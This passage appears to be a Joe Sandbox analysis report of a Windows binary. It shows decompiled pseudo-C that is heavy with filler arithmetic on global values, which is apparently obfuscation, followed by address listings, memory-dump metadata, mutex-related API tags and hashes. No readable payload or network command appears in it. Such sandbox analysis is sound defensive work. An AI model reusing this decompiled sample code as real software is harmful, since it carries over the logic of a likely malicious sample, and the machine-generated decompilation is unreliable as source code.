                                                                    				signed char _t388;
                                                                    				signed char _t389;
                                                                    				intOrPtr _t395;
                                                                    				void* _t399;
                                                                    				signed int _t423;
                                                                    				void* _t424;
                                                                    				intOrPtr* _t428;
                                                                    				intOrPtr* _t431;
                                                                    				intOrPtr _t433;
                                                                    				signed short _t437;
                                                                    				intOrPtr _t448;
                                                                    				intOrPtr _t466;
                                                                    				void* _t472;
                                                                    				void* _t473;
                                                                    				void* _t479;
                                                                    				intOrPtr _t481;
                                                                    				signed int _t482;
                                                                    				intOrPtr _t485;
                                                                    				intOrPtr _t492;
                                                                    				void* _t493;
                                                                    				intOrPtr _t501;
                                                                    				signed int _t503;
                                                                    				intOrPtr _t508;
                                                                    				void* _t509;
                                                                    				void* _t510;
                                                                    				void* _t511;
                                                                    				void* _t512;
                                                                    
                                                                    				_push(0xffffffff);
                                                                    				_push(E0042FE40);
                                                                    				_push( *[fs:0x0]);
                                                                    				 *[fs:0x0] = _t508;
                                                                    				_t509 = _t508 - 0x70;
                                                                    				_t501 = __ecx;
                                                                    				 *((intOrPtr*)(_t509 + 0x14)) = __ecx;
                                                                    				 *((intOrPtr*)(_t509 + 0x7c)) = 0xf;
                                                                    				 *((intOrPtr*)(_t509 + 0x78)) = 0;
                                                                    				 *((char*)(_t509 + 0x68)) = 0;
                                                                    				 *((intOrPtr*)(_t509 + 0x88)) = 0;
                                                                    				 *((intOrPtr*)(_t509 + 0x60)) = 0xf;
                                                                    				 *((intOrPtr*)(_t509 + 0x5c)) = 0;
                                                                    				 *((char*)(_t509 + 0x4c)) = 0;
                                                                    				_t478 =  *((intOrPtr*)(_t509 + 0x98));
                                                                    				 *((char*)(_t509 + 0x90)) = 1;
                                                                    				_t210 = E00419F30(_t509 + 0x68,  *((intOrPtr*)(_t509 + 0x98)) + 0x38);
                                                                    				_t510 = _t509 + 8;
                                                                    				if(_t210 != 0) {
                                                                    					_t211 =  *((intOrPtr*)(_t510 + 0x90));
                                                                    					if( *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x90)) + 0x14)) == 0) {
                                                                    						_t213 = E00419F30(_t510 + 0x48, _t478);
                                                                    						_t510 = _t510 + 8;
                                                                    						if(_t213 == 0) {
                                                                    							E00402810(_t510 + 0x50, 0x430192, 0);
                                                                    						}
                                                                    					} else {
                                                                    						E00402720(_t510 + 0x54, _t211, 0, 0xffffffff);
                                                                    					}
                                                                    					_t331 =  *(_t510 + 0x13) + (( *(_t510 + 0x13) & 0x000000ff) +  *((intOrPtr*)(_t510 + 0x18)) - 0x00000011 & 0x00000066) * 0x76;
                                                                    					if( *((intOrPtr*)(_t510 + 0x5c)) != 0) {
                                                                    						_t479 = 0x16;
                                                                    						do {
                                                                    							_t331 = _t331 + 0xe7;
                                                                    							_t479 = _t479 - 1;
                                                                    						} while (_t479 != 0);
                                                                    						_t222 = E00402360();
                                                                    						 *((intOrPtr*)(_t510 + 0x34)) = _t222;
                                                                    						 *((char*)(_t222 + 0x2d)) = 1;
                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x34)) + 4)) =  *((intOrPtr*)(_t510 + 0x34));
                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x34)))) =  *((intOrPtr*)(_t510 + 0x34));
                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x34)) + 8)) =  *((intOrPtr*)(_t510 + 0x34));
                                                                    						 *((intOrPtr*)(_t510 + 0x38)) = 0;
                                                                    						 *((char*)(_t510 + 0x88)) = 2;
                                                                    						_t226 = E00402360();
                                                                    						 *((intOrPtr*)(_t510 + 0x40)) = _t226;
                                                                    						 *((char*)(_t226 + 0x2d)) = 1;
                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x40)) + 4)) =  *((intOrPtr*)(_t510 + 0x40));
                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x40)))) =  *((intOrPtr*)(_t510 + 0x40));
                                                                    						 *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x40)) + 8)) =  *((intOrPtr*)(_t510 + 0x40));
                                                                    						 *((intOrPtr*)(_t510 + 0x44)) = 0;
                                                                    						_t231 =  *((intOrPtr*)(_t510 + 0x68));
                                                                    						 *((char*)(_t510 + 0x88)) = 3;
                                                                    						 *(_t510 + 0x12) = 0;
                                                                    						if( *((intOrPtr*)(_t510 + 0x7c)) < 0x10) {
                                                                    							_t231 = _t510 + 0x68;
                                                                    						}
                                                                    						if(E004040E0( *((intOrPtr*)(_t501 + 0x2c)), _t231, _t510 + 0x30) != 0) {
                                                                    							_t481 =  *0x447d20; // 0x0
                                                                    							E00418060(0x447d28, _t481);
                                                                    							_t350 =  *((intOrPtr*)(_t510 + 0x34));
                                                                    							_t234 =  *_t350;
                                                                    							_t466 = _t234;
                                                                    							 *((intOrPtr*)(_t510 + 0x1c)) = 0;
                                                                    							 *((intOrPtr*)(_t510 + 0x18)) = _t466;
                                                                    							if(_t234 == _t350) {
                                                                    								L49:
                                                                    								_t351 =  *0x447d1c; // 0x0
                                                                    							} else {
                                                                    								do {
                                                                    									_t503 =  *(_t510 + 0x12);
                                                                    									 *0x447d24 =  *0x447d24 - _t503;
                                                                    									_t263 =  *((intOrPtr*)(_t510 + 0x4c));
                                                                    									if( *((intOrPtr*)(_t510 + 0x60)) < 0x10) {
                                                                    										_t263 = _t510 + 0x4c;
                                                                    									}
                                                                    									_t485 =  *((intOrPtr*)(_t510 + 0x14));
                                                                    									_t473 = _t466 + 0xc;
                                                                    									_push(0x2bf20);
                                                                    									_t264 = E004183B0(_t485, _t263,  *((intOrPtr*)(_t466 + 0xc)));
                                                                    									 *(_t510 + 0x20) = _t264;
                                                                    									if(_t264 == 0) {
                                                                    										_t265 =  *0x447d28; // 0x0
                                                                    										_t433 =  *0x447d20; // 0x0
                                                                    										 *0x447d28 = _t265 + (_t433 - _t265 + 0x8b) * 0x4f;
                                                                    										_t268 = E004184D0(_t485,  *((intOrPtr*)(_t510 + 0x94)),  *((intOrPtr*)(_t510 + 0x98)));
                                                                    										_t504 = _t268;
                                                                    										if(_t268 == 0) {
                                                                    											_push(_t510 + 0x20);
                                                                    											E004180B0();
                                                                    											_t270 =  *0x447d28; // 0x0
                                                                    											 *0x447d28 = _t270 * 0x3855;
                                                                    											if( *((intOrPtr*)(_t485 + 4)) != 0xffffffff) {
                                                                    												E00418330(_t485);
                                                                    												E00419180();
                                                                    											}
                                                                    											_t437 =  *0x447d24; // 0x0
                                                                    											_t351 =  *0x447d1c; // 0x0
                                                                    											_t501 =  *((intOrPtr*)(_t510 + 0x14));
                                                                    											 *((intOrPtr*)(_t510 + 0x1c)) = 1;
                                                                    											 *0x447d24 = _t437 + (_t351 - (_t437 & 0x0000ffff) - 0x00000043 | 0x0000005a) * 0x19;
                                                                    										} else {
                                                                    											 *(_t510 + 0x20) =  *(_t510 + 0x12);
                                                                    											E00418020( *(_t510 + 0x12),  *((intOrPtr*)(_t510 + 0x18)), 0x447d1c);
                                                                    											_t492 =  *((intOrPtr*)(_t510 + 0x14));
                                                                    											if( *((intOrPtr*)(_t492 + 4)) != 0xffffffff) {
                                                                    												E00418330(_t492);
                                                                    												E00419180();
                                                                    											}
                                                                    											_t331 = _t331 &  *(_t510 + 0x12);
                                                                    											_t384 =  *((intOrPtr*)(_t492 + 0x30));
                                                                    											if( *((intOrPtr*)(_t492 + 0x30)) != 0) {
                                                                    												E00417EF0(_t384, _t504,  *((intOrPtr*)(_t492 + 0x24)),  *((intOrPtr*)(_t492 + 0x28)));
                                                                    											}
                                                                    											_t385 =  *0x447d20; // 0x0
                                                                    											_t123 = _t385 - 0x5d; // -93
                                                                    											_push(_t473);
                                                                    											 *0x447d20 = _t385 + ((( *0x447d24 & 0x0000ffff) * 0x00000072 ^ _t123) + (( *0x447d24 & 0x0000ffff) * 0x00000072 ^ _t123) * 8) * 8;
                                                                    											E004031C0(_t510 + 0x2c);
                                                                    											_t388 =  *((intOrPtr*)(_t510 + 0x18));
                                                                    											_t389 = _t388 - _t331;
                                                                    											 *(_t510 + 0x13) =  *(_t510 + 0x20) * _t388;
                                                                    											_t493 = 0x59;
                                                                    											do {
                                                                    												_t493 = _t493 - 1;
                                                                    												 *(_t510 + 0x12) =  *(_t510 + 0x12) + (_t389 ^  *(_t510 + 0x12) |  *(_t510 + 0x13) | 0x0000003b);
                                                                    											} while (_t493 != 0);
                                                                    											goto L47;
                                                                    										}
                                                                    									} else {
                                                                    										E00418020( *(_t510 + 0x12),  *((intOrPtr*)(_t510 + 0x18)), 0x447d1c);
                                                                    										_t448 =  *((intOrPtr*)(_t510 + 0x14));
                                                                    										_t394 =  *((intOrPtr*)(_t448 + 0x30));
                                                                    										if( *((intOrPtr*)(_t448 + 0x30)) != 0) {
                                                                    											E00417EF0(_t394,  *((intOrPtr*)(_t510 + 0x24)),  *((intOrPtr*)(_t448 + 0x24)),  *((intOrPtr*)(_t448 + 0x28)));
                                                                    										}
                                                                    										_t395 =  *0x447d20; // 0x0
                                                                    										_push(_t473);
                                                                    										_t331 = _t331 + ((_t331 & 0x000000ff) + _t395 - 0x00000011 & 0x00000066) * 0x76;
                                                                    										E004031C0(_t510 + 0x24);
                                                                    										_t302 =  *((intOrPtr*)(_t510 + 0x18)) + 0x00000010 ^  *0x447d24 & 0x0000ffff ^ _t503 & 0x0000ffff;
                                                                    										_t399 = 0x1f;
                                                                    										do {
                                                                    											 *0x447d24 =  *0x447d24 + (_t503 *  *0x447d24 | _t302);
                                                                    											_t399 = _t399 - 1;
                                                                    										} while (_t399 != 0);
                                                                    										goto L47;
                                                                    									}
                                                                    									goto L50;
                                                                    									L47:
                                                                    									E00401F60(_t510 + 0x18);
                                                                    									_t466 =  *((intOrPtr*)(_t510 + 0x18));
                                                                    								} while (_t466 !=  *((intOrPtr*)(_t510 + 0x34)));
                                                                    								_t501 =  *((intOrPtr*)(_t510 + 0x14));
                                                                    								goto L49;
                                                                    							}
                                                                    							L50:
                                                                    							if( *((intOrPtr*)(_t510 + 0x44)) != 0) {
                                                                    								_t428 =  *((intOrPtr*)(_t510 + 0x40));
                                                                    								_t254 =  *_t428;
                                                                    								 *((intOrPtr*)(_t510 + 0x18)) = _t254;
                                                                    								if(_t254 != _t428) {
                                                                    									do {
                                                                    										_t472 = E00418880(_t510 + 0x34, _t254 + 0xc);
                                                                    										_t259 = E00418820(_t510 + 0x34, _t254 + 0xc);
                                                                    										_t431 = _t259;
                                                                    										if(_t259 != _t472) {
                                                                    											do {
                                                                    												if( *((intOrPtr*)(_t431 + 0x2d)) == 0) {
                                                                    													_t371 =  *((intOrPtr*)(_t431 + 8));
                                                                    													if( *((intOrPtr*)(_t371 + 0x2d)) != 0) {
                                                                    														_t372 =  *((intOrPtr*)(_t431 + 4));
                                                                    														if( *((intOrPtr*)(_t372 + 0x2d)) == 0) {
                                                                    															while(_t431 ==  *((intOrPtr*)(_t372 + 8))) {
                                                                    																_t431 = _t372;
                                                                    																_t372 =  *((intOrPtr*)(_t372 + 4));
                                                                    																if( *((intOrPtr*)(_t372 + 0x2d)) == 0) {
                                                                    																	continue;
                                                                    																}
                                                                    																goto L66;
                                                                    															}
                                                                    														}
                                                                    														L66:
                                                                    														_t431 = _t372;
                                                                    													} else {
                                                                    														_t431 = _t371;
                                                                    														_t373 =  *_t431;
                                                                    														while( *((intOrPtr*)(_t373 + 0x2d)) == 0) {
                                                                    															_t431 = _t373;
                                                                    															_t373 =  *_t431;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											} while (_t431 != _t472);
                                                                    										}
                                                                    										E004032C0(_t510 + 0x3c, _t510 + 0x28, _t259, _t472);
                                                                    										E00401F60(_t510 + 0x18);
                                                                    										_t254 =  *((intOrPtr*)(_t510 + 0x18));
                                                                    									} while ( *((intOrPtr*)(_t510 + 0x18)) !=  *((intOrPtr*)(_t510 + 0x40)));
                                                                    									_t351 =  *0x447d1c; // 0x0
                                                                    								}
                                                                    								_t255 =  *0x447d20; // 0x0
                                                                    								_t170 = _t255 - 0x5d; // -93
                                                                    								_t256 =  *((intOrPtr*)(_t510 + 0x68));
                                                                    								 *0x447d20 = _t255 + ((_t351 * 0x00000072 ^ _t170) + (_t351 * 0x00000072 ^ _t170) * 8) * 8;
                                                                    								if( *((intOrPtr*)(_t510 + 0x7c)) < 0x10) {
                                                                    									_t256 = _t510 + 0x68;
                                                                    								}
                                                                    								_push(_t510 + 0x30);
                                                                    								_push(_t256);
                                                                    								E00404540( *((intOrPtr*)(_t501 + 0x2c)));
                                                                    								_t351 =  *0x447d1c; // 0x0
                                                                    							}
                                                                    							_t482 = 0 |  *((intOrPtr*)(_t510 + 0x1c)) == 0x00000000;
                                                                    							_t423 =  *0x447d24; // 0x0
                                                                    							_t239 =  *0x447d28 &  *0x447d24 ^ 0x0000002b;
                                                                    							_t352 = _t351 ^ _t423;
                                                                    							_t424 = 0x15;
                                                                    							do {
                                                                    								_t332 =  *0x447d28; // 0x0
                                                                    								 *0x447d28 =  *0x447d28 + (_t352 ^ _t332 | _t239);
                                                                    								_t424 = _t424 - 1;
                                                                    							} while (_t424 != 0);
                                                                    							_t353 =  *((intOrPtr*)(_t501 + 0x30));
                                                                    							if( *((intOrPtr*)(_t501 + 0x30)) != 0) {
                                                                    								E00417EF0(_t353, _t482,  *((intOrPtr*)(_t501 + 0x24)),  *((intOrPtr*)(_t501 + 0x28)));
                                                                    							}
                                                                    							 *((char*)(_t510 + 0x94)) = 2;
                                                                    							E004032C0(_t510 + 0x48, _t510 + 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x40)))),  *((intOrPtr*)(_t510 + 0x40)));
                                                                    							_push( *((intOrPtr*)(_t510 + 0x40)));
                                                                    							L00421F9D();
                                                                    							_t511 = _t510 + 4;
                                                                    							 *((intOrPtr*)(_t511 + 0x40)) = 0;
                                                                    							 *((intOrPtr*)(_t511 + 0x44)) = 0;
                                                                    							 *((char*)(_t511 + 0x94)) = 1;
                                                                    							E004032C0(_t511 + 0x3c, _t511 + 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t510 + 0x38)))),  *((intOrPtr*)(_t510 + 0x38)));
                                                                    							_push( *((intOrPtr*)(_t511 + 0x34)));
                                                                    							L00421F9D();
                                                                    							_t512 = _t511 + 4;
                                                                    							 *((intOrPtr*)(_t512 + 0x34)) = 0;
                                                                    							 *((intOrPtr*)(_t512 + 0x38)) = 0;
                                                                    							if( *((intOrPtr*)(_t511 + 0x64)) >= 0x10) {
                                                                    								_push( *((intOrPtr*)(_t512 + 0x4c)));
                                                                    								L00421F9D();
                                                                    								_t512 = _t512 + 4;
                                                                    							}
                                                                    							 *((intOrPtr*)(_t512 + 0x60)) = 0xf;
                                                                    							 *((intOrPtr*)(_t512 + 0x5c)) = 0;
                                                                    							 *((char*)(_t512 + 0x4c)) = 0;
                                                                    							if( *((intOrPtr*)(_t512 + 0x7c)) >= 0x10) {
                                                                    								_push( *((intOrPtr*)(_t512 + 0x68)));
                                                                    								L00421F9D();
                                                                    								_t512 = _t512 + 4;
                                                                    							}
                                                                    							 *[fs:0x0] =  *((intOrPtr*)(_t512 + 0x80));
                                                                    							return _t482;
                                                                    						} else {
                                                                    							_t400 =  *((intOrPtr*)(_t501 + 0x30));
                                                                    							if( *((intOrPtr*)(_t501 + 0x30)) != 0) {
                                                                    								E00417EF0(_t400, 4,  *((intOrPtr*)(_t501 + 0x24)),  *((intOrPtr*)(_t501 + 0x28)));
                                                                    							}
                                                                    							 *((char*)(_t510 + 0x88)) = 2;
                                                                    							E004034D0();
                                                                    							 *((char*)(_t510 + 0x88)) = 1;
                                                                    							E004034D0();
                                                                    							if( *((intOrPtr*)(_t510 + 0x60)) >= 0x10) {
                                                                    								_push( *((intOrPtr*)(_t510 + 0x4c)));
                                                                    								L00421F9D();
                                                                    								_t510 = _t510 + 4;
                                                                    							}
                                                                    							 *((intOrPtr*)(_t510 + 0x60)) = 0xf;
                                                                    							 *((intOrPtr*)(_t510 + 0x5c)) = 0;
                                                                    							 *((char*)(_t510 + 0x4c)) = 0;
                                                                    							if( *((intOrPtr*)(_t510 + 0x7c)) >= 0x10) {
                                                                    								_push( *((intOrPtr*)(_t510 + 0x68)));
                                                                    								L00421F9D();
                                                                    								_t510 = _t510 + 4;
                                                                    							}
                                                                    							 *[fs:0x0] =  *((intOrPtr*)(_t510 + 0x70));
                                                                    							return 4;
                                                                    						}
                                                                    					} else {
                                                                    						_t405 =  *((intOrPtr*)(_t501 + 0x30));
                                                                    						if( *((intOrPtr*)(_t501 + 0x30)) != 0) {
                                                                    							E00417EF0(_t405, 2,  *((intOrPtr*)(_t501 + 0x24)),  *((intOrPtr*)(_t501 + 0x28)));
                                                                    						}
                                                                    						if( *((intOrPtr*)(_t510 + 0x60)) >= 0x10) {
                                                                    							_push( *((intOrPtr*)(_t510 + 0x4c)));
                                                                    							L00421F9D();
                                                                    							_t510 = _t510 + 4;
                                                                    						}
                                                                    						 *((intOrPtr*)(_t510 + 0x60)) = 0xf;
                                                                    						 *((intOrPtr*)(_t510 + 0x5c)) = 0;
                                                                    						 *((char*)(_t510 + 0x4c)) = 0;
                                                                    						if( *((intOrPtr*)(_t510 + 0x7c)) >= 0x10) {
                                                                    							_push( *((intOrPtr*)(_t510 + 0x68)));
                                                                    							L00421F9D();
                                                                    							_t510 = _t510 + 4;
                                                                    						}
                                                                    						goto L18;
                                                                    					}
                                                                    				} else {
                                                                    					_t410 =  *((intOrPtr*)(_t501 + 0x30));
                                                                    					if( *((intOrPtr*)(_t501 + 0x30)) != 0) {
                                                                    						E00417EF0(_t410, 2,  *((intOrPtr*)(_t501 + 0x24)),  *((intOrPtr*)(_t501 + 0x28)));
                                                                    					}
                                                                    					if( *((intOrPtr*)(_t510 + 0x60)) >= 0x10) {
                                                                    						_push( *((intOrPtr*)(_t510 + 0x4c)));
                                                                    						L00421F9D();
                                                                    						_t510 = _t510 + 4;
                                                                    					}
                                                                    					 *((intOrPtr*)(_t510 + 0x60)) = 0xf;
                                                                    					 *((intOrPtr*)(_t510 + 0x5c)) = 0;
                                                                    					 *((char*)(_t510 + 0x4c)) = 0;
                                                                    					if( *((intOrPtr*)(_t510 + 0x7c)) < 0x10) {
                                                                    						L18:
                                                                    						 *[fs:0x0] =  *((intOrPtr*)(_t510 + 0x70));
                                                                    						return 2;
                                                                    					} else {
                                                                    						_push( *((intOrPtr*)(_t510 + 0x68)));
                                                                    						L00421F9D();
                                                                    						 *[fs:0x0] =  *((intOrPtr*)(_t510 + 0x74));
                                                                    						return 2;
                                                                    					}
                                                                    				}
                                                                    			}


























































                                                                    0x004188e0
                                                                    0x004188e2
                                                                    0x004188ed
                                                                    0x004188ee
                                                                    0x004188f5
                                                                    0x004188fc
                                                                    0x00418905
                                                                    0x00418909
                                                                    0x0041890d
                                                                    0x00418911
                                                                    0x00418916
                                                                    0x0041891d
                                                                    0x00418921
                                                                    0x00418925
                                                                    0x0041892a
                                                                    0x0041893a
                                                                    0x00418942
                                                                    0x00418947
                                                                    0x0041894c
                                                                    0x004189bc
                                                                    0x004189c6
                                                                    0x004189dd
                                                                    0x004189e2
                                                                    0x004189e7
                                                                    0x004189f3
                                                                    0x004189f3
                                                                    0x004189c8
                                                                    0x004189d0
                                                                    0x004189d0
                                                                    0x00418a0d
                                                                    0x00418a13
                                                                    0x00418a8f
                                                                    0x00418a94
                                                                    0x00418a9a
                                                                    0x00418a9c
                                                                    0x00418a9c
                                                                    0x00418aa3
                                                                    0x00418aa8
                                                                    0x00418aac
                                                                    0x00418ab4
                                                                    0x00418abb
                                                                    0x00418ac1
                                                                    0x00418ac4
                                                                    0x00418acc
                                                                    0x00418ad4
                                                                    0x00418ad9
                                                                    0x00418add
                                                                    0x00418ae5
                                                                    0x00418aec
                                                                    0x00418af2
                                                                    0x00418af5
                                                                    0x00418b04
                                                                    0x00418b08
                                                                    0x00418b10
                                                                    0x00418b15
                                                                    0x00418b17
                                                                    0x00418b17
                                                                    0x00418b2b
                                                                    0x00418bba
                                                                    0x00418bc5
                                                                    0x00418bca
                                                                    0x00418bce
                                                                    0x00418bd2
                                                                    0x00418bd4
                                                                    0x00418bdc
                                                                    0x00418be0
                                                                    0x00418dc6
                                                                    0x00418dc6
                                                                    0x00418be6
                                                                    0x00418be6
                                                                    0x00418be6
                                                                    0x00418bf0
                                                                    0x00418bfa
                                                                    0x00418bfe
                                                                    0x00418c00
                                                                    0x00418c00
                                                                    0x00418c07
                                                                    0x00418c0b
                                                                    0x00418c0e
                                                                    0x00418c17
                                                                    0x00418c1e
                                                                    0x00418c22
                                                                    0x00418cba
                                                                    0x00418cc0
                                                                    0x00418cde
                                                                    0x00418cef
                                                                    0x00418cf4
                                                                    0x00418cf8
                                                                    0x00418e54
                                                                    0x00418e57
                                                                    0x00418e5c
                                                                    0x00418e67
                                                                    0x00418e71
                                                                    0x00418e75
                                                                    0x00418e7c
                                                                    0x00418e7c
                                                                    0x00418e81
                                                                    0x00418e88
                                                                    0x00418e8e
                                                                    0x00418ea5
                                                                    0x00418ead
                                                                    0x00418cfe
                                                                    0x00418d0c
                                                                    0x00418d10
                                                                    0x00418d15
                                                                    0x00418d1d
                                                                    0x00418d21
                                                                    0x00418d28
                                                                    0x00418d28
                                                                    0x00418d2d
                                                                    0x00418d31
                                                                    0x00418d36
                                                                    0x00418d41
                                                                    0x00418d41
                                                                    0x00418d4d
                                                                    0x00418d56
                                                                    0x00418d61
                                                                    0x00418d66
                                                                    0x00418d71
                                                                    0x00418d76
                                                                    0x00418d81
                                                                    0x00418d85
                                                                    0x00418d89
                                                                    0x00418d90
                                                                    0x00418da4
                                                                    0x00418da5
                                                                    0x00418da5
                                                                    0x00000000
                                                                    0x00418d90
                                                                    0x00418c28
                                                                    0x00418c36
                                                                    0x00418c3b
                                                                    0x00418c3f
                                                                    0x00418c44
                                                                    0x00418c55
                                                                    0x00418c55
                                                                    0x00418c5a
                                                                    0x00418c6d
                                                                    0x00418c77
                                                                    0x00418c79
                                                                    0x00418c91
                                                                    0x00418c93
                                                                    0x00418ca0
                                                                    0x00418cab
                                                                    0x00418cb2
                                                                    0x00418cb2
                                                                    0x00000000
                                                                    0x00418cb5
                                                                    0x00000000
                                                                    0x00418dab
                                                                    0x00418daf
                                                                    0x00418db4
                                                                    0x00418db8
                                                                    0x00418dc2
                                                                    0x00000000
                                                                    0x00418dc2
                                                                    0x00418dcc
                                                                    0x00418dd2
                                                                    0x00418dd8
                                                                    0x00418ddc
                                                                    0x00418de0
                                                                    0x00418de4
                                                                    0x00418df0
                                                                    0x00418e02
                                                                    0x00418e04
                                                                    0x00418e0b
                                                                    0x00418e0d
                                                                    0x00418e13
                                                                    0x00418e18
                                                                    0x00418e1e
                                                                    0x00418e26
                                                                    0x00418eb9
                                                                    0x00418ec1
                                                                    0x00418ec3
                                                                    0x00418ec8
                                                                    0x00418eca
                                                                    0x00418ed2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00418ed2
                                                                    0x00418ec3
                                                                    0x00418ed4
                                                                    0x00418ed4
                                                                    0x00418e2c
                                                                    0x00418e2c
                                                                    0x00418e2e
                                                                    0x00418e35
                                                                    0x00418e40
                                                                    0x00418e42
                                                                    0x00418e47
                                                                    0x00418e35
                                                                    0x00418e26
                                                                    0x00418ed6
                                                                    0x00418e13
                                                                    0x00418ee9
                                                                    0x00418ef2
                                                                    0x00418ef7
                                                                    0x00418efb
                                                                    0x00418f05
                                                                    0x00418f05
                                                                    0x00418f0b
                                                                    0x00418f13
                                                                    0x00418f23
                                                                    0x00418f27
                                                                    0x00418f2d
                                                                    0x00418f2f
                                                                    0x00418f2f
                                                                    0x00418f37
                                                                    0x00418f3b
                                                                    0x00418f3c
                                                                    0x00418f41
                                                                    0x00418f41
                                                                    0x00418f59
                                                                    0x00418f64
                                                                    0x00418f6a
                                                                    0x00418f6d
                                                                    0x00418f6f
                                                                    0x00418f74
                                                                    0x00418f74
                                                                    0x00418f80
                                                                    0x00418f87
                                                                    0x00418f87
                                                                    0x00418f8a
                                                                    0x00418f91
                                                                    0x00418f9c
                                                                    0x00418f9c
                                                                    0x00418fb2
                                                                    0x00418fba
                                                                    0x00418fc3
                                                                    0x00418fc4
                                                                    0x00418fcd
                                                                    0x00418fd0
                                                                    0x00418fd4
                                                                    0x00418fe5
                                                                    0x00418fed
                                                                    0x00418ff6
                                                                    0x00418ff7
                                                                    0x00419005
                                                                    0x0041900a
                                                                    0x0041900e
                                                                    0x00419012
                                                                    0x00419018
                                                                    0x00419019
                                                                    0x0041901e
                                                                    0x0041901e
                                                                    0x00419025
                                                                    0x0041902d
                                                                    0x00419031
                                                                    0x00419036
                                                                    0x0041903c
                                                                    0x0041903d
                                                                    0x00419042
                                                                    0x00419042
                                                                    0x00419052
                                                                    0x0041905c
                                                                    0x00418b31
                                                                    0x00418b31
                                                                    0x00418b36
                                                                    0x00418b42
                                                                    0x00418b42
                                                                    0x00418b4b
                                                                    0x00418b53
                                                                    0x00418b5c
                                                                    0x00418b64
                                                                    0x00418b6d
                                                                    0x00418b73
                                                                    0x00418b74
                                                                    0x00418b79
                                                                    0x00418b79
                                                                    0x00418b80
                                                                    0x00418b88
                                                                    0x00418b8c
                                                                    0x00418b91
                                                                    0x00418b97
                                                                    0x00418b98
                                                                    0x00418b9d
                                                                    0x00418b9d
                                                                    0x00418bad
                                                                    0x00418bb7
                                                                    0x00418bb7
                                                                    0x00418a15
                                                                    0x00418a15
                                                                    0x00418a1a
                                                                    0x00418a26
                                                                    0x00418a26
                                                                    0x00418a36
                                                                    0x00418a3c
                                                                    0x00418a3d
                                                                    0x00418a42
                                                                    0x00418a42
                                                                    0x00418a49
                                                                    0x00418a51
                                                                    0x00418a55
                                                                    0x00418a5a
                                                                    0x00418a60
                                                                    0x00418a61
                                                                    0x00418a66
                                                                    0x00418a66
                                                                    0x00000000
                                                                    0x00418a5a
                                                                    0x0041894e
                                                                    0x0041894e
                                                                    0x00418953
                                                                    0x0041895f
                                                                    0x0041895f
                                                                    0x0041896f
                                                                    0x00418975
                                                                    0x00418976
                                                                    0x0041897b
                                                                    0x0041897b
                                                                    0x00418982
                                                                    0x00418986
                                                                    0x0041898a
                                                                    0x0041898f
                                                                    0x00418a69
                                                                    0x00418a76
                                                                    0x00418a80
                                                                    0x00418995
                                                                    0x00418999
                                                                    0x0041899a
                                                                    0x004189af
                                                                    0x004189b9
                                                                    0x004189b9
                                                                    0x0041898f

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.557333474.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.557324719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557403915.0000000000430000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000431000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557414845.0000000000434000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557460686.0000000000446000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557474141.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557508931.0000000000453000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.557537195.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                    Similarity
                                                                    • API ID: MutexObjectReleaseSingleWait
                                                                    • String ID:
                                                                    • API String ID: 2017088797-0
                                                                    • Opcode ID: 57a8a9a55f01e96364733f635fcb8b978af8e48f8b5a082b31f70b70227edd3d
                                                                    • Instruction ID: 669890123181474b4f28002e09748109dfe72ea3c62383c2b97c21f70e3d6e14
                                                                    • Opcode Fuzzy Hash: 57a8a9a55f01e96364733f635fcb8b978af8e48f8b5a082b31f70b70227edd3d
                                                                    • Instruction Fuzzy Hash: 2522C3B56083408FC314DF29C490AABFBE5AFD9704F14492EF98587351DB39E846CB9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E00413770(char __ebx, void* __edi, signed int __esi, void* __ebp, char _a4, char _a8, char _a16, intOrPtr _a20, char _a32, void* _a44, char _a48, char _a56, void* _a68, void* _a72, char _a76, intOrPtr _a80, intOrPtr _a84, void* _a92, void* _a96, char _a100, char _a104, void* _a108, void* _a112, char _a116, void* _a120, void* _a124, void* _a128, char _a156, char _a176, void* _a180, void* _a200, void* _a204, void* _a208, void* _a224, intOrPtr _a268, void* _a288, void* _a320, void* _a348, void* _a372, void* _a380, char _a700, void* _a1048, char _a1056, void* _a1092, intOrPtr _a1100, char _a1108, intOrPtr _a1120) {
                                                                    				char _v0;
                                                                    				char _v4;
                                                                    				void* _v8;
                                                                    				char _v12;
                                                                    				void* _v20;
                                                                    				char _v24;
                                                                    				void* _v28;
                                                                    				void* _v32;
                                                                    				void* _v36;
                                                                    				void* _v40;
                                                                    				void* _v48;
                                                                    				void* _v52;
                                                                    				void* _t108;
                                                                    				char _t114;
                                                                    				void* _t116;
                                                                    				signed int _t117;
                                                                    				void* _t123;
                                                                    				intOrPtr _t128;
                                                                    				void* _t131;
                                                                    				signed int _t137;
                                                                    				signed int _t138;
                                                                    				signed int _t157;
                                                                    				intOrPtr _t161;
                                                                    				signed int _t165;
                                                                    				signed int _t166;
                                                                    				signed int _t168;
                                                                    				char _t177;
                                                                    				signed int _t188;
                                                                    				char* _t192;
